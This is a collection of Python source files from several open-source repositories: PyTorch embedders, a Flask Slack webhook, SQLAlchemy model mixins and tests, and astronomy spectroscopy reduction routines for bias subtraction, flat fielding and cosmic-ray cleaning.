y_true, y_pred = kwargs['y_true'], kwargs['y_pred']
self.value = self.metric_fn(y_true, y_pred)
```
#### File: onfire/onfire/embedders.py
```python
import torch
import torch.nn as nn
__all__ = [
'ConcatEmbeddings',
'PassThrough',
'MeanOfEmbeddings',
]
class ConcatEmbeddings(nn.Module):
def __init__(self, fields):
super().__init__()
self.output_dim = sum([field.output_dim for field in fields.values()])
self.embedders = nn.ModuleList([field.build_embedder() for field in fields.values()])
def forward(self, x):
res = [embedder(values) for embedder, values in zip(self.embedders, x)]
return torch.cat(res, dim=1)
class PassThrough(nn.Module):
def forward(self, x):
return x
class MeanOfEmbeddings(nn.Module):
def __init__(self, vocab_size, emb_dim):
super().__init__()
self.emb = nn.Embedding(vocab_size, emb_dim, padding_idx=0)
def forward(self, x):
mask = (x != 0).float()[:, :, None]
emb = self.emb(x) * mask.float()
s = mask.squeeze(2).sum(1).clamp_min(1.)[:, None].float()
return emb.sum(dim=1) / s
```
#### File: onfire/onfire/utils.py
```python
from functools import wraps
import torch
__all__ = [
'mappify',
'batch_to_device',
]
def mappify(func):
@wraps(func)
def inner(X, **kwargs):
return [func(x, **kwargs) for x in X]
return inner
def batch_to_device(batch, device):
if isinstance(batch, torch.Tensor):
return batch.to(device)
elif isinstance(batch, (list, tuple)):
res = [batch_to_device(x, device) for x in batch]
return res if isinstance(batch, list) else tuple(res)
elif isinstance(batch, dict):
return {k: batch_to_device(v, device) for k, v in batch.items()}
``` |
{
"source": "joshfriend/atlas",
"score": 2
} |
#### File: api/webhooks/slash.py
```python
import re
import json
from textwrap import dedent
from flask import jsonify, Response, request
from flask.views import MethodView
from webargs.flaskparser import use_args
from atlas.api import api_v1_blueprint as bp, log, require_token
from atlas.api.webhooks import slash_cmd_args
from atlas.api.webhooks.jira_mention import jira_command
from atlas.utils import slack_encode
class SlashCommand(MethodView):
def get(self):
# Before submitting a command to your server, Slack will occasionally
# send your command URLs a simple GET request to verify the
# certificate. These requests will include a parameter `ssl_check` set
# to 1. Mostly, you may ignore these requests, but please do respond
# with a HTTP `200 OK`.
if request.args.get('ssl_check', 0, type=int):
log.info('SSL Check...')
return Response()
else:
abort(400)
@require_token
@use_args(slash_cmd_args)
def post(self, args):
command = args['command']
if command == '/jira':
return jira_command(args)
elif command == '/debug':
debug_data = '```\n%s\n```' % json.dumps(request.form, indent=2)
return ephemeral_message(debug_data)
else:
log.error('Unknown command: %s', command)
msg = 'I don\'t know what to do with that command :('
return ephemeral_message(msg)
bp.add_url_rule('/webhooks/slash', view_func=SlashCommand.as_view('slash'))
def ephemeral_message(txt):
return jsonify({
'response_type': 'ephemeral',
'text': slack_encode(txt),
})
```
#### File: atlas/atlas/database.py
```python
from collections import Container
from datetime import datetime
import pytz
from sqlalchemy.orm import joinedload
from atlas.extensions import db
class CRUDMixin(object):
"""Mixin that adds convenience methods for CRUD (create, read, update, delete)
operations.
"""
@classmethod
def create(cls, commit=True, **kwargs):
"""Create a new record and save it the database."""
instance = cls(**kwargs)
return instance.save(commit=commit)
def update(self, commit=True, **kwargs):
"""Update specific fields of a record."""
# Prevent changing ID of object
kwargs.pop('id', None)
for attr, value in kwargs.iteritems():
setattr(self, attr, value)
return commit and self.save(commit=commit) or self
def save(self, commit=True):
"""Save the record."""
db.session.add(self)
if commit:
db.session.commit()
return self
def delete(self, commit=True):
"""Remove the record from the database."""
db.session.delete(self)
return commit and db.session.commit()
class Model(CRUDMixin, db.Model):
"""Base model class that includes CRUD convenience methods."""
__abstract__ = True
@classmethod
def get_by_field(cls, field, value):
col = getattr(cls, field)
return cls.query.filter(col == value).first()
class TimestampedModel(Model):
"""Mixin that add convenience methods for CRUD that also timestamps
creation and modification times.
"""
__abstract__ = True
created_at = db.Column(db.DateTime(timezone=True))
last_updated = db.Column(db.DateTime(timezone=True))
def __init__(self, *args, **kwargs):
Model.__init__(self, *args, **kwargs)
now = datetime.now(pytz.utc)
self.created_at = now
self.last_updated = now
@classmethod
def create(cls, commit=True, **kwargs):
instance = cls(**kwargs)
now = datetime.now(pytz.utc)
instance.created_at = now
instance.last_updated = now
return instance.save(commit=commit)
def update(self, commit=True, update_timestamp=True, **kwargs):
"""Update specific fields of a record."""
if update_timestamp:
now = datetime.now(pytz.utc)
self.last_updated = now
# Prevent changing ID of object
kwargs.pop('id', None)
for attr, value in kwargs.iteritems():
setattr(self, attr, value)
return self.save(commit=commit, update_timestamp=update_timestamp)
def save(self, commit=True, update_timestamp=True):
if update_timestamp:
now = datetime.now(pytz.utc)
self.last_updated = now
db.session.add(self)
if commit:
db.session.commit()
return self
# From <NAME>'s "Building the app" talk
# https://speakerdeck.com/zzzeek/building-the-app
class SurrogatePK(object):
"""A mixin that adds a surrogate integer 'primary key' column named
``id`` to any declarative-mapped class.
"""
__table_args__ = {'extend_existing': True}
id = db.Column(db.Integer, primary_key=True)
@classmethod
def get_by_id(cls, id, with_=[]):
if any(
(isinstance(id, str) and id.isdigit(),
isinstance(id, (int, float))),
):
query = cls.query
for prop in with_:
query = query.options(joinedload(prop))
return query.get(int(id))
return None
@classmethod
def get_by_ids(cls, ids):
if isinstance(ids, Container) and not isinstance(ids, str):
return cls.query.filter(cls.id.in_(ids))
return None
def __repr__(self): # pragma: no cover
return '<%s(%s)>' % (self.__class__.__name__, self.id)
```
#### File: atlas/models/slack_token.py
```python
from atlas.extensions import db
from atlas.database import SurrogatePK, TimestampedModel
class SlackToken(SurrogatePK, TimestampedModel):
token = db.Column(db.String, unique=True, nullable=False)
channel = db.Column(db.String, nullable=False)
description = db.Column(db.String)
@classmethod
def get(cls, token):
return cls.query.filter(cls.token == token).first()
@classmethod
def is_valid(cls, token):
return cls.get(token) is not None
def __str__(self):
msg = '`%s`' % self.token
if self.channel == '*':
msg += ' in all channels: '
else:
msg += ' in channel #%s: ' % self.channel
msg += self.description
return msg
``` |
{
"source": "joshfriend/sqlalchemy-utils",
"score": 2
} |
#### File: sqlalchemy-utils/sqlalchemy_utils/decorators.py
```python
from collections import defaultdict
import itertools
import sqlalchemy as sa
import six
from .functions import getdotattr
class AttributeValueGenerator(object):
def __init__(self):
self.listener_args = [
(
sa.orm.mapper,
'mapper_configured',
self.update_generator_registry
),
(
sa.orm.session.Session,
'before_flush',
self.update_generated_properties
)
]
self.reset()
def reset(self):
if (
hasattr(self, 'listeners_registered') and
self.listeners_registered
):
for args in self.listener_args:
sa.event.remove(*args)
self.listeners_registered = False
# TODO: make the registry a WeakKey dict
self.generator_registry = defaultdict(list)
def generator_wrapper(self, func, attr, source):
def wrapper(self, *args, **kwargs):
return func(self, *args, **kwargs)
if isinstance(attr, sa.orm.attributes.InstrumentedAttribute):
self.generator_registry[attr.class_].append(wrapper)
wrapper.__generates__ = attr, source
else:
wrapper.__generates__ = attr, source
return wrapper
def register_listeners(self):
if not self.listeners_registered:
for args in self.listener_args:
sa.event.listen(*args)
self.listeners_registered = True
def update_generator_registry(self, mapper, class_):
"""
Adds generator functions to generator_registry.
"""
for generator in class_.__dict__.values():
if hasattr(generator, '__generates__'):
self.generator_registry[class_].append(generator)
def update_generated_properties(self, session, ctx, instances):
for obj in itertools.chain(session.new, session.dirty):
class_ = obj.__class__
if class_ in self.generator_registry:
for func in self.generator_registry[class_]:
attr, source = func.__generates__
if not isinstance(attr, six.string_types):
attr = attr.name
if source is None:
setattr(obj, attr, func(obj))
else:
setattr(obj, attr, func(obj, getdotattr(obj, source)))
generator = AttributeValueGenerator()
def generates(attr, source=None, generator=generator):
"""
.. deprecated:: 0.28.0
Use :func:`.observer.observes` instead.
Decorator that marks given function as attribute value generator.
Many times you may have generated property values. Usual cases include
slugs from names or resized thumbnails from images.
SQLAlchemy-Utils provides a way to do this easily with `generates`
decorator:
::
class Article(Base):
__tablename__ = 'article'
id = sa.Column(sa.Integer, primary_key=True)
name = sa.Column(sa.Unicode(255))
slug = sa.Column(sa.Unicode(255))
@generates(slug)
def _create_slug(self):
return self.name.lower().replace(' ', '-')
article = self.Article()
article.name = u'some article name'
self.session.add(article)
self.session.flush()
assert article.slug == u'some-article-name'
You can also pass the attribute name as a string argument for `generates`:
::
class Article(Base):
...
@generates('slug')
def _create_slug(self):
return self.name.lower().replace(' ', '-')
These property generators can even be defined outside classes:
::
class Article(Base):
__tablename__ = 'article'
id = sa.Column(sa.Integer, primary_key=True)
name = sa.Column(sa.Unicode(255))
slug = sa.Column(sa.Unicode(255))
@generates(Article.slug)
def _create_article_slug(article):
return article.name.lower().replace(' ', '-')
Property generators can have sources outside:
::
class Document(self.Base):
__tablename__ = 'document'
id = sa.Column(sa.Integer, primary_key=True)
name = sa.Column(sa.Unicode(255))
locale = sa.Column(sa.String(10))
class Section(self.Base):
__tablename__ = 'section'
id = sa.Column(sa.Integer, primary_key=True)
name = sa.Column(sa.Unicode(255))
locale = sa.Column(sa.String(10))
document_id = sa.Column(
sa.Integer, sa.ForeignKey(Document.id)
)
document = sa.orm.relationship(Document)
@generates(locale, source='document')
def copy_locale(self, document):
return document.locale
You can also use dotted attribute paths for deep relationship paths:
::
class SubSection(self.Base):
__tablename__ = 'subsection'
id = sa.Column(sa.Integer, primary_key=True)
name = sa.Column(sa.Unicode(255))
locale = sa.Column(sa.String(10))
section_id = sa.Column(
sa.Integer, sa.ForeignKey(Section.id)
)
section = sa.orm.relationship(Section)
@generates(locale, source='section.document')
def copy_locale(self, document):
return document.locale
"""
generator.register_listeners()
def wraps(func):
return generator.generator_wrapper(func, attr, source)
return wraps
```
#### File: sqlalchemy-utils/tests/__init__.py
```python
import warnings
import sqlalchemy as sa
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from sqlalchemy.ext.declarative import declarative_base, synonym_for
from sqlalchemy.ext.hybrid import hybrid_property
from sqlalchemy_utils import (
InstrumentedList, coercion_listener, aggregates, i18n
)
@sa.event.listens_for(sa.engine.Engine, 'before_cursor_execute')
def count_sql_calls(conn, cursor, statement, parameters, context, executemany):
try:
conn.query_count += 1
except AttributeError:
conn.query_count = 0
warnings.simplefilter('error', sa.exc.SAWarning)
sa.event.listen(sa.orm.mapper, 'mapper_configured', coercion_listener)
def get_locale():
class Locale():
territories = {'fi': 'Finland'}
return Locale()
class TestCase(object):
dns = 'sqlite:///:memory:'
create_tables = True
def setup_method(self, method):
self.engine = create_engine(self.dns)
# self.engine.echo = True
self.connection = self.engine.connect()
self.Base = declarative_base()
self.create_models()
sa.orm.configure_mappers()
if self.create_tables:
self.Base.metadata.create_all(self.connection)
Session = sessionmaker(bind=self.connection)
self.session = Session()
i18n.get_locale = get_locale
def teardown_method(self, method):
aggregates.manager.reset()
self.session.close_all()
if self.create_tables:
self.Base.metadata.drop_all(self.connection)
self.connection.close()
self.engine.dispose()
def create_models(self):
class User(self.Base):
__tablename__ = 'user'
id = sa.Column(sa.Integer, autoincrement=True, primary_key=True)
name = sa.Column(sa.Unicode(255))
class Category(self.Base):
__tablename__ = 'category'
id = sa.Column(sa.Integer, primary_key=True)
name = sa.Column(sa.Unicode(255))
@hybrid_property
def articles_count(self):
return len(self.articles)
@articles_count.expression
def articles_count(cls):
return (
sa.select([sa.func.count(self.Article.id)])
.where(self.Article.category_id == self.Category.id)
.correlate(self.Article.__table__)
.label('article_count')
)
@property
def name_alias(self):
return self.name
@synonym_for('name')
@property
def name_synonym(self):
return self.name
class Article(self.Base):
__tablename__ = 'article'
id = sa.Column(sa.Integer, primary_key=True)
name = sa.Column(sa.Unicode(255), index=True)
category_id = sa.Column(sa.Integer, sa.ForeignKey(Category.id))
category = sa.orm.relationship(
Category,
primaryjoin=category_id == Category.id,
backref=sa.orm.backref(
'articles',
collection_class=InstrumentedList
)
)
self.User = User
self.Category = Category
self.Article = Article
def assert_contains(clause, query):
# Test that query executes
query.all()
assert clause in str(query)
```
#### File: tests/observes/test_o2o_o2o_o2o.py
```python
import sqlalchemy as sa
from sqlalchemy_utils.observer import observes
from tests import TestCase
class TestObservesForOneToOneToOneToOne(TestCase):
dns = 'postgres://postgres@localhost/sqlalchemy_utils_test'
def create_models(self):
class Catalog(self.Base):
__tablename__ = 'catalog'
id = sa.Column(sa.Integer, primary_key=True)
product_price = sa.Column(sa.Integer)
@observes('category.sub_category.product')
def product_observer(self, product):
self.product_price = product.price if product else None
category = sa.orm.relationship(
'Category',
uselist=False,
backref='catalog'
)
class Category(self.Base):
__tablename__ = 'category'
id = sa.Column(sa.Integer, primary_key=True)
catalog_id = sa.Column(sa.Integer, sa.ForeignKey('catalog.id'))
sub_category = sa.orm.relationship(
'SubCategory',
uselist=False,
backref='category'
)
class SubCategory(self.Base):
__tablename__ = 'sub_category'
id = sa.Column(sa.Integer, primary_key=True)
category_id = sa.Column(sa.Integer, sa.ForeignKey('category.id'))
product = sa.orm.relationship(
'Product',
uselist=False,
backref='sub_category'
)
class Product(self.Base):
__tablename__ = 'product'
id = sa.Column(sa.Integer, primary_key=True)
price = sa.Column(sa.Integer)
sub_category_id = sa.Column(
sa.Integer, sa.ForeignKey('sub_category.id')
)
self.Catalog = Catalog
self.Category = Category
self.SubCategory = SubCategory
self.Product = Product
def create_catalog(self):
sub_category = self.SubCategory(product=self.Product(price=123))
category = self.Category(sub_category=sub_category)
catalog = self.Catalog(category=category)
self.session.add(catalog)
self.session.flush()
return catalog
def test_simple_insert(self):
catalog = self.create_catalog()
assert catalog.product_price == 123
def test_replace_leaf_object(self):
catalog = self.create_catalog()
product = self.Product(price=44)
catalog.category.sub_category.product = product
self.session.flush()
assert catalog.product_price == 44
def test_delete_leaf_object(self):
catalog = self.create_catalog()
self.session.delete(catalog.category.sub_category.product)
self.session.flush()
assert catalog.product_price is None
```
#### File: tests/types/test_encrypted.py
```python
import sqlalchemy as sa
from datetime import datetime, date, time
import pytest
from pytest import mark
cryptography = None
try:
import cryptography
except ImportError:
pass
from tests import TestCase
from sqlalchemy_utils import EncryptedType, PhoneNumberType, ColorType
from sqlalchemy_utils.types.encrypted import AesEngine, FernetEngine
@mark.skipif('cryptography is None')
class EncryptedTypeTestCase(TestCase):
@pytest.fixture(scope='function')
def user(self, request):
# set the values to the user object
self.user = self.User()
self.user.username = self.user_name
self.user.phone = self.user_phone
self.user.color = self.user_color
self.user.date = self.user_date
self.user.time = self.user_time
self.user.enum = self.user_enum
self.user.datetime = self.user_datetime
self.user.access_token = self.test_token
self.user.is_active = self.active
self.user.accounts_num = self.accounts_num
self.session.add(self.user)
self.session.commit()
# register a finalizer to cleanup
def finalize():
del self.user_name
del self.test_token
del self.active
del self.accounts_num
del self.test_key
del self.searched_user
request.addfinalizer(finalize)
return self.session.query(self.User).get(self.user.id)
def generate_test_token(self):
import string
import random
token = ''
characters = string.ascii_letters + string.digits
for i in range(60):
token += ''.join(random.choice(characters))
return token
def create_models(self):
# set some test values
self.test_key = 'secretkey1234'
self.user_name = u'someone'
self.user_phone = u'(555) 555-5555'
self.user_color = u'#fff'
self.user_enum = 'One'
self.user_date = date(2010, 10, 2)
self.user_time = time(10, 12)
self.user_datetime = datetime(2010, 10, 2, 10, 12)
self.test_token = self.generate_test_token()
self.active = True
self.accounts_num = 2
self.searched_user = None
class User(self.Base):
__tablename__ = 'user'
id = sa.Column(sa.Integer, primary_key=True)
username = sa.Column(EncryptedType(
sa.Unicode,
self.test_key,
self.__class__.encryption_engine)
)
access_token = sa.Column(EncryptedType(
sa.String,
self.test_key,
self.__class__.encryption_engine)
)
is_active = sa.Column(EncryptedType(
sa.Boolean,
self.test_key,
self.__class__.encryption_engine)
)
accounts_num = sa.Column(EncryptedType(
sa.Integer,
self.test_key,
self.__class__.encryption_engine)
)
phone = sa.Column(EncryptedType(
PhoneNumberType,
self.test_key,
self.__class__.encryption_engine)
)
color = sa.Column(EncryptedType(
ColorType,
self.test_key,
self.__class__.encryption_engine)
)
date = sa.Column(EncryptedType(
sa.Date,
self.test_key,
self.__class__.encryption_engine)
)
time = sa.Column(EncryptedType(
sa.Time,
self.test_key,
self.__class__.encryption_engine)
)
datetime = sa.Column(EncryptedType(
sa.DateTime,
self.test_key,
self.__class__.encryption_engine)
)
enum = sa.Column(EncryptedType(
sa.Enum('One', name='user_enum_t'),
self.test_key,
self.__class__.encryption_engine)
)
self.User = User
class Team(self.Base):
__tablename__ = 'team'
id = sa.Column(sa.Integer, primary_key=True)
key = sa.Column(sa.String(50))
name = sa.Column(EncryptedType(
sa.Unicode,
lambda: self._team_key,
self.__class__.encryption_engine)
)
self.Team = Team
def test_unicode(self, user):
assert user.username == self.user_name
def test_string(self, user):
assert user.access_token == self.test_token
def test_boolean(self, user):
assert user.is_active == self.active
def test_integer(self, user):
assert user.accounts_num == self.accounts_num
def test_phone_number(self, user):
assert str(user.phone) == self.user_phone
def test_color(self, user):
assert user.color.hex == self.user_color
def test_date(self, user):
assert user.date == self.user_date
def test_datetime(self, user):
assert user.datetime == self.user_datetime
def test_time(self, user):
assert user.time == self.user_time
def test_enum(self, user):
assert user.enum == self.user_enum
def test_lookup_key(self):
# Add teams
self._team_key = 'one'
team = self.Team(key=self._team_key, name=u'One')
self.session.add(team)
self.session.commit()
team_1_id = team.id
self._team_key = 'two'
team = self.Team(key=self._team_key)
team.name = u'Two'
self.session.add(team)
self.session.commit()
team_2_id = team.id
# Lookup teams
self._team_key = self.session.query(self.Team.key).filter_by(
id=team_1_id
).one()[0]
team = self.session.query(self.Team).get(team_1_id)
assert team.name == u'One'
with pytest.raises(Exception):
self.session.query(self.Team).get(team_2_id)
self.session.expunge_all()
self._team_key = self.session.query(self.Team.key).filter_by(
id=team_2_id
).one()[0]
team = self.session.query(self.Team).get(team_2_id)
assert team.name == u'Two'
with pytest.raises(Exception):
self.session.query(self.Team).get(team_1_id)
self.session.expunge_all()
# Remove teams
self.session.query(self.Team).delete()
self.session.commit()
class TestAesEncryptedTypeTestcase(EncryptedTypeTestCase):
encryption_engine = AesEngine
def test_lookup_by_encrypted_string(self, user):
test = self.session.query(self.User).filter(
self.User.username == self.user_name
).first()
assert test.username == user.username
class TestFernetEncryptedTypeTestCase(EncryptedTypeTestCase):
encryption_engine = FernetEngine
``` |
{
"source": "joshfuchs/photometry",
"score": 2
} |
#### File: joshfuchs/photometry/ReduceSpec_tools.py
```python
import numpy as np
#import pyfits as fits
import astropy.io.fits as fits
import os
import datetime
import matplotlib.pyplot as plt
import cosmics
from glob import glob
from astropy.convolution import convolve, convolve_fft, Box2DKernel
# ===========================================================================
# Lesser Functions Used by Main Functions ===================================
# ===========================================================================
def init():
global diagnostic
diagnostic = np.zeros([2071,8])
def save_diagnostic():
#This function save a diagnostic file to be used later to create diagnostic plots
global now
now = datetime.datetime.now().strftime("%Y-%m-%dT%H:%M")
header = 'Reduction done on ' + now + ' \n Columns are: 0) average from bias, 1) average from scaled bias, 2) standard deviation of bias \n 3) flat field average, 4) flat field standard deviation, 5) flat field scaled average, 6) flat field scaled standard deviation '
with open('reduction_' + now + '.txt','ab') as handle:
np.savetxt(handle,diagnostic,fmt='%f',header=header)
def gauss(x,p): #single gaussian
return p[0] + p[1]*np.exp(-(((x-p[2])/(np.sqrt(2)*p[3])))**2.)
def fitgauss(p,fjac=None,x=None,y=None,err=None):
#Parameter values are passed in p
#fjac = None just means partial derivatives will not be computed
model = gauss(x,p)
status = 0
return([status,(y-model)/err])
def gaussslope(x,p): #single gaussian
return p[0] + p[1]*x + p[2]*np.exp(-(((x-p[3])/(np.sqrt(2)*p[4])))**2.)
def fitgaussslope(p,fjac=None,x=None,y=None,err=None):
#Parameter values are passed in p
#fjac = None just means partial derivatives will not be computed
model = gaussslope(x,p)
status = 0
return([status,(y-model)/err])
def adcstat(specname):
hdu = fits.getheader(specname)
adc_stat = hdu['ADCSTAT']
print ('ADC status during observations was ', adc_stat)
return adc_stat
# ============================================================================
def Read_List( lst ):
# This function reads a list of images and decomposes them into a python
# list of image names.
list_file = open(lst,'r')
im_list = list_file.read()
list_file.close()
im_list = im_list.split()
return im_list
def List_Combe(img_list):
# This is meant to combe trough list names to identify seperate sublist of
# stars / flats / standars
sub_lists= [] # list of sub_list of images
sl= [] # sub_list of images
sl.append(img_list[0]) # place first image in sublist
i= 0; # image counter
#img_list[0][0] is a string, so need to check that agaisnt strings. Use a shorter cutpoint if these are RAW images. This will help eliminate problems with short filenames.
if (img_list[0][0] == '0') or (img_list[0][0] == '1') or (img_list[0][0] == '2'):
cutpoint = 5
else:
cutpoint = 10
while i < len(img_list)-1: # run trough all images
if img_list[i+1].__contains__(img_list[i][cutpoint:]) == True: #Old = 4
sl.append(img_list[i+1]) # place it in the sub_list
else:
# if the images dont match:
sub_lists.append(sl) # write the sublist to the list of sublist
sl= [] # clear the sublist
sl.append(img_list[i+1]) # append the image to the new list
i= i+1 # image counter
sub_lists.append(sl) # append the last sublist to the list of sublist
return sub_lists # return the list of sub_list of images
def check_file_exist(name):
# This function is to be called before wirting a file.
# This function checks if the file name already exist.
# If it does it appends a number to the begining until
# the name no longer matches the files in the directory.
# List of files in directory
listDirFiles = [f for f in os.listdir('.') if f.endswith('.fits')]
# If "name" is in the derectory append a number i until it doent match
# If name is not in directory then we simply return name
if listDirFiles.__contains__(name):
i= 2
while listDirFiles.__contains__(name):
name= str(i) + name
i= i+1
return name
def Fix_Header( header ):
# This function deletes the header cards that contain the badly coded
# degree symbol '\xb0'. If they are not deleted pyfits won't write the
# headers.
bad_key = ['param0', 'param61', 'param62', 'param63']
for p in bad_key:
if p in header:
bad_str = header.comments[p]
if '\xb0' in bad_str:
del header[p]
def decimal_dec(hdu_str):
# Read header strings in "hh:mm:ss" or "dd:mm:ss" fromat
# and outputs the value as a decimal.
val_list = [float(n) for n in hdu_str.split(':')]
#if val_list[0] < 0 :
if str(val_list[0])[0] == '-':
sng = -1
val_list[0] = sng*val_list[0]
else:
sng = 1
val_deci = sng*(val_list[0]+((val_list[1]+(val_list[2]/60.0))/60.0))
return val_deci
def decimal_ra(hdu_str):
# Read header strings in "hh:mm:ss" or "dd:mm:ss" fromat
# and outputs the value as a decimal.
val_list = [float(n) for n in hdu_str.split(':')]
if val_list[0] < 0 :
sng = -1.
val_list[0] = sng*val_list[0]
else:
sng = 1.
val_deci = 15.*sng*(val_list[0]+((val_list[1]+(val_list[2]/60.0))/60.0))
return val_deci
def SigClip(data_set, lo_sig, hi_sig):
# Sigma Cliping Function #
# Input is set of counts for a particular pixel,
# along with low and high sigma factors.
# Output is a list containg only the data that is with the sigma factors.
# Only a single rejection iteration is made.
Avg = np.median(data_set)
#remove_max = np.delete(data_set,data_set.argmax())
#St_Dev = np.std(remove_max)
St_Dev = np.std(data_set)
min_val = Avg-lo_sig*St_Dev
max_val = Avg+hi_sig*St_Dev
cliped_data = []
#masked_data = []
for val in data_set:
if min_val <= val <= max_val:
cliped_data.append( val )
#else:
# masked_data.append( val)
return cliped_data#, masked_data
def RaDec2AltAz(ra, dec, lat, lst ):
# Input: RA in decimal hours; DEC in decimal deg;
# LAT in decimal deg; LST in decimal hours;
# Output: ALT, AZ, HA in decimal deg.
# Compute Hour Angle
ha = lst-ra # hour angle in deg
if ha < 0 :
ha = ha+360.
if ha > 360:
ha = ha-360.
# Convert Qunataties to Radians
ra = ra*(np.pi/180.0)
dec = dec*(np.pi/180.0)
lat = lat*(np.pi/180.0)
ha = ha*(np.pi/180.0)
# Calculate Altitiude
a = np.sin(dec)*np.sin(lat)
b = np.cos(dec)*np.cos(lat)*np.cos(ha)
alt = np.arcsin( a+b ) # altitude in radians
# Calculate Azimuth
a = np.sin(dec)-np.sin(lat)*np.sin(alt)
b = np.cos(lat)*np.cos(alt)
az = np.arccos( a/b ) # azumuth in radians
if np.sin(ha) > 0:
az = (2.*np.pi) - az
# Convert Alt, Az, and Ha to decimal deg
alt = alt*(180.0/np.pi)
az = az*(180.0/np.pi)
ha = ha*(180.0/np.pi)
return alt, az, ha
def AirMass(alt, scale):
# Calculates instantaneus airmass to be called by SetAirMass() #
# This comes from Allen, Astrophysical Quantities, page 125.
# See also http://stsdas.stsci.edu/cgi-bin/gethelp.cgi?setairmass
# Input:
# scale = atmospheric scale factor (defalut 750)
# alt = altitude of star in degrees.
# Output:
# AM = airmass from given altitude and scale factor
x = scale*np.sin(np.pi*alt/180.)
AM = np.sqrt( x**2. + 2.*scale + 1. ) - x
return AM
def EffectiveAirMass(AM_st, AM_mid, AM_end):
# Calculate effective airmass to be called by SetAirMass() and Imcombine()
# This comes from Stetson, 'Some Factors Affecting the Accuracy of Stellar
# Photometry with CCDs,' DAO preprint, September 1988 and uses Simpson's rule.
# See also http://stsdas.stsci.edu/cgi-bin/gethelp.cgi?setairmass
# Input: airmass at start, middel, and end of an exposure.
# Output: Effective Airmass
AM_eff = (AM_st + 4.*AM_mid + AM_end)/6.
return AM_eff
def Add_Scale (img_block):
# Function to be called by Imcombine.
# The function is meant to additively sclae a set of images, (zeros in particular).
# The input is a numpy block of pixel values (see imcombine).
# The function calculates the average number of
# counts of the region [25:75, 1700:1800] of the first image.
# Then scales the rest of the images by adding the diffrence between the
# average counts of the first image and its own.
# Returns a scaled image block, and a list of scale values.
print("Scaling Counts Additively.\n")
ni, ny, nx = np.shape(img_block)
Cavg= [] # Average Counts
Sval= [] # Scale Values
for i in range(0,ni):
Cavg.append( np.mean(img_block[i,:,:]) )
Sval.append( Cavg[0]-Cavg[i] )
img_block[i]= img_block[i] + Sval[i]
try:
diagnostic[0:len(Cavg),0] = np.array(Cavg)
except:
pass
return img_block, Sval
def Mult_Scale (img_block,index):
# Function to be called by Imcombine.
# The function is meant to multiplicative sclae a set of images, (flats in particular).
# The input is a numpy block of pixel values (see imcombine).
# The function calculates the average number of
# counts of the region [25:75, 1700:1800] of the first image.
# Then scales the rest of the images by multiplying by the ratio between the
# average counts of the first image and its own.
# Returns a scaled image block, and a list of scale values.
print("Scaling Counts Multiplicatively.\n")
ni, ny, nx = np.shape(img_block)
Cavg= [] # Average Counts
Cstd = [] #Standard deviation
Sval= [] # Scale Values
for i in range(0,ni):
Cavg.append( np.mean(img_block[i,:,:]) )
Cstd.append( np.std(img_block[i,:,:]))
Sval.append( Cavg[0]/Cavg[i] )
img_block[i]= img_block[i]*Sval[i]
try:
if index == 1:
diagnostic[0:len(Cavg),3] = np.array(Cavg)
diagnostic[0:len(Cstd),4] = np.array(Cstd)
except:
pass
return img_block, Sval
# ===========================================================================
# Main Functions ============================================================
# ===========================================================================
def lacosmic(img):
#This function runs LA Cosmic on the images
#LA Cosmic is explained in PASP 113, 1420 (2001)
#This implementation comes, originally, from http://www.astro.yale.edu/dokkum/lacosmic/
print('')
print('Finding cosmic rays in ', img)
datalist = fits.open(img)
data = datalist[0].data
data2 = data[0,:,:]
array = data2
header = fits.getheader(img)
Fix_Header(header)
#gain = 1.33 #datalist[0].header['GAIN'] #1.33 from 2017-06-07
gain = datalist[0].header['GAIN']
rdnoise = datalist[0].header['RDNOISE']
c = cosmics.cosmicsimage(array, gain=gain, readnoise=rdnoise, sigclip = 5.0, sigfrac = 0.5, objlim = 4.0,satlevel=45000.0,verbose=True)
c.run(maxiter=4)
maskname = img[0:img.find('.fits')] + '_mask.fits'
mask_array = np.expand_dims(c.mask,axis=0)
mask_array = np.cast['uint8'](mask_array)
mask_im = fits.PrimaryHDU(data=mask_array,header=header)
mask_im.writeto(maskname,clobber=True)
print('Mask image: ', maskname)
cleanname = 'c' + img
data_array = np.expand_dims(c.cleanarray,axis=0)
header.set('MASK',maskname,'Mask of cosmic rays')
clean_im = fits.PrimaryHDU(data=data_array,header=header)
clean_im.writeto(cleanname,clobber=True)
print('Clean image: ', cleanname)
return cleanname, maskname
def Bias_Subtract( img_list, zero_img ):
# This function takes in a list of images and a bias image 'zero_img'
# and performs a pixel by pixel subtration using numpy.
# The function writes the bias subtracted images as 'b.Img_Name.fits'.
# The output is a list of names for the bias subtrated images.
print("\n====================\n")
print('Bias Subtracting Images: \n')
zero_data = fits.getdata(zero_img)
bias_sub_list = []
for img in img_list:
print(img)
hdu = fits.getheader(img)
Fix_Header(hdu)
img_data = fits.getdata(img)
img_data[ np.isnan(img_data) ] = 0
b_img_data = np.subtract(img_data, zero_data)
print('b.'+"%s Mean: %.3f StDev: %.3f" % (img, np.mean(b_img_data), np.std(img_data)))
hdu.set( 'DATEBIAS', datetime.datetime.now().strftime("%Y-%m-%d"), 'Date of Bias Subtraction' )
hdu.append( ('BIASSUB', zero_img ,'Image Used to Bias Subtract.'),
useblanks= True, bottom= True )
NewHdu = fits.PrimaryHDU(b_img_data, hdu)
#bias_sub_name= check_file_exist('b.'+img)
bias_sub_name= 'b.'+img
NewHdu.writeto(bias_sub_name, output_verify='warn', clobber= True)
bias_sub_list.append( bias_sub_name )
return bias_sub_list
# ===========================================================================
def Norm_Flat_Avg( flat ):
# Takes average value of all the pixels and devides the entier flat by
# that value using numpy.
print("\n====================\n")
print('Normalizing %s By Dividing Each Pixel By Average Value:' % ( flat ))
# Read Data, take average, and divide #
flat_data = fits.getdata(flat)
flat_data[ np.isnan(flat_data) ] = 0
# Calculate Average of the flat excluding bottom row and overscan regions #
avg_flat = np.average( flat_data[:,:,:] )
norm_flat_data = np.divide( flat_data, float(avg_flat) )
print('Average Value: %s\n' % avg_flat)
# Copy Header, write changes, and write file #
hdu = fits.getheader(flat)
Fix_Header(hdu)
hdu.append( ('NORMFLAT', avg_flat,'Average Used to Normalize the Flat.'),
useblanks= True, bottom= True )
NewHdu = fits.PrimaryHDU(data= norm_flat_data, header= hdu)
#norm_flat_name= check_file_exist('n'+flat)
norm_flat_name= 'n'+flat
NewHdu.writeto(norm_flat_name, output_verify='warn', clobber= True )
print ('Flat: %s Mean: %.3f StDev: %.3f' % (norm_flat_name, np.mean(norm_flat_data), np.std(norm_flat_data)))
return (norm_flat_name)
# ============================================================================
# ===========================================================================
